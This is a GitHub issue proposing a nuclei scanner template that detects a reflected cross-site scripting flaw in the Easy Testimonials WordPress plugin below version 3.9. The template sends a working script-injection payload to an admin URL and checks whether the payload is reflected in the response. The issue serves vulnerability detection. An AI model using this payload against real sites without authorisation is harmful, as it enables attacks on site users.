### ISSUE TITLE
Easy Testimonials < 3.9 - Reflected Cross-Site Scripting

### ISSUE THREAD

**Issue by akincibor** [projectdiscovery/nuclei-templates#4695]
```yaml
id: easy-testimonials-xss

info:
  name: Easy Testimonials < 3.9 - Reflected Cross-Site Scripting
  author: Akincibor
  severity: medium
  description: The plugin, when used along the Pro version, does not escape an URL before outputting it back in an attribute, leading to Reflected Cross-Site Scripting.
  reference:
    - https://wpscan.com/vulnerability/571fc466-98c5-4f11-9ac3-0f826f3d9253
  tags: wp-plugin,xss,wp,wordpress

requests:
  - method: GET
    path:
      - '{{BaseURL}}/wp-admin/admin.php?page=easy_testimonials_pro_privacy_notice&a"><script>alert(document.domain)</script>'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"><script>alert(document.domain)</script>'

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
```
